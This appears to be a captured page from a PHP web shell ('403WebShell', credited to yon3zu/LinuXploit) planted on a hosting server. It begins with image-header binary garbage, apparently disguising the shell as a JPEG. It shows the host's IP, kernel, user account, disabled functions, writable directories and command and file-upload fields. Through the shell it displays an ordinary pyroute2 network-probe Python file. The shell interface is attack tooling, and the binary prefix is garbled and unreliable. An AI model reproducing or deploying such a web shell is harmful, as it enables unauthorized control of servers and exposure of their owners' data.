JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 88.223.91.11  /  Your IP : 216.73.217.1
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/opt/alt/python311/lib/python3.11/site-packages/pyroute2/netlink/rtnl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/opt/alt/python311/lib/python3.11/site-packages/pyroute2/netlink/rtnl//probe_msg.py
import errno
import json
import shutil
import socket
import ssl
import subprocess

from pyroute2.netlink import nlmsg
from pyroute2.netlink.exceptions import NetlinkError


class probe_msg(nlmsg):
    '''
    Fake message type to represent network probe info.

    This is a prototype, the NLA layout is subject to change without
    notification.
    '''

    __slots__ = ()
    prefix = 'PROBE_'

    fields = (('family', 'B'), ('proto', 'B'), ('port', 'H'), ('dst_len', 'I'))

    nla_map = (
        ('PROBE_UNSPEC', 'none'),
        ('PROBE_KIND', 'asciiz'),
        ('PROBE_STDOUT', 'asciiz'),
        ('PROBE_STDERR', 'asciiz'),
        ('PROBE_SRC', 'asciiz'),
        ('PROBE_DST', 'asciiz'),
        ('PROBE_NUM', 'uint8'),
        ('PROBE_TIMEOUT', 'uint8'),
        ('PROBE_HOSTNAME', 'asciiz'),
        ('PROBE_SSL_VERIFY', 'uint8'),
        ('PROBE_SSL_VERSION', 'asciiz'),
        ('PROBE_SSL_CERT_JSON', 'asciiz'),
        ('PROBE_SSL_CERT_DER', 'cdata'),
    )


def probe_ping(msg):
    num = msg.get('num')
    timeout = msg.get('timeout')
    dst = msg.get('dst')
    kind = msg.get('kind')
    args = [shutil.which(kind), '-c', f'{num}', '-W', f'{timeout}', f'{dst}']
    if args[0] is None:
        raise NetlinkError(errno.ENOENT, 'probe not found')

    process = subprocess.Popen(
        args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
    )
    try:
        out, err = process.communicate(timeout=timeout)
        if out:
            msg['attrs'].append(['PROBE_STDOUT', out])
        if err:
            msg['attrs'].append(['PROBE_STDERR', err])
    except subprocess.TimeoutExpired:
        process.terminate()
        raise NetlinkError(errno.ETIMEDOUT, 'timeout expired')
    finally:
        process.stdout.close()
        process.stderr.close()
        return_code = process.wait()
    if return_code != 0:
        raise NetlinkError(errno.EHOSTUNREACH, 'probe failed')


def probe_tcp(msg, close=True):
    timeout = msg.get('timeout')
    dst = msg.get('dst')
    port = msg.get('port')
    connection = None
    try:
        connection = socket.create_connection((dst, port), timeout=timeout)
    except ConnectionRefusedError:
        raise NetlinkError(errno.ECONNREFUSED, 'connection refused')
    except TimeoutError:
        raise NetlinkError(errno.ETIMEDOUT, 'timeout expired')
    except Exception:
        raise NetlinkError(errno.ECOMM, 'probe failed')
    finally:
        if close and connection is not None:
            connection.close()
    return connection


def probe_ssl(msg):
    hostname = msg.get('hostname') or msg.get('dst')
    context = ssl.create_default_context()
    context.verify_mode = msg.get('ssl_verify', ssl.CERT_REQUIRED)
    with probe_tcp(msg, close=False) as connection:
        try:
            with context.wrap_socket(
                connection, server_hostname=hostname
            ) as ssl_wrap:
                version = ssl_wrap.version()
                peer_cert_json = ssl_wrap.getpeercert(binary_form=False)
                peer_cert_der = ssl_wrap.getpeercert(binary_form=True)
                if peer_cert_json is not None:
                    msg['attrs'].append(
                        ['PROBE_SSL_CERT_JSON', json.dumps(peer_cert_json)]
                    )
                if peer_cert_der is not None:
                    msg['attrs'].append(['PROBE_SSL_CERT_DER', peer_cert_der])
                if version is not None:
                    msg['attrs'].append(['PROBE_SSL_VERSION', version])
        except ssl.SSLError as e:
            code = errno.EPROTO
            if e.reason == 'UNSUPPORTED_PROTOCOL':
                code = errno.EPROTONOSUPPORT
            elif e.reason == 'CERTIFICATE_VERIFY_FAILED':
                code = errno.EACCES
            raise NetlinkError(code, e.strerror)
        except Exception:
            raise NetlinkError(errno.ECOMM, 'probe failed')


def proxy_newprobe(msg):
    kind = msg.get('kind')
    if kind.startswith('ping'):
        probe_ping(msg)
    elif kind == 'tcp':
        probe_tcp(msg)
    elif kind == 'ssl':
        probe_ssl(msg)
    else:
        raise NetlinkError(errno.ENOTSUP, 'probe type not supported')
    msg.reset()
    msg.encode()
    return msg.data

Youez - 2016 - github.com/yon3zu
LinuXploit